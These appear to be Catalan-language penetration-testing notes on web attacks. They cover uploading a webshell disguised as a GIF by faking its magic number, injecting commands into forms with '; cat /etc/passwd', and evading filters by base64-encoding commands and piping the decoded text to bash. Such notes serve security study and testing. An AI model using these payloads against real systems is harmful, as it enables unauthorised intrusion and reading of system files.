Formulari de pujada de fitxers #

• Si comprova el tipus de fitxer es pot canviar el MAGICNUMBER i pujar una webshell del tipus que està serivint les pàgines web (jsp,asp...)
• Exemple de webshell php fent-se passar per un GIF:

GIF98
<php ...

Shells i formularis que permeten injecció de comandes #

• Només faria falta tancar l'ordre que s'envia i concatenar la següent.
• En linux:

; cat /etc/passwd

• Si la màquina fa algún tipus de comprovació sobre les comandes que s'executen es pot fer algun tipus de codificació i decodificació posterior per a enganyar al sistema

• Per exemple amb un canvi de base a base64:

  • Primer xifro

roger@roger-System-Product-Name:~$ echo 'comandes que es volen executar' | base64
Y29tYW5kZXMgcXVlIGVzIHZvbGVuIGV4ZWN1dGFyCg==

- Després li passo al formulari:

echo 'Y29tYW5kZXMgcXVlIGVzIHZvbGVuIGV4ZWN1dGFyCg==' | base64 -d | bash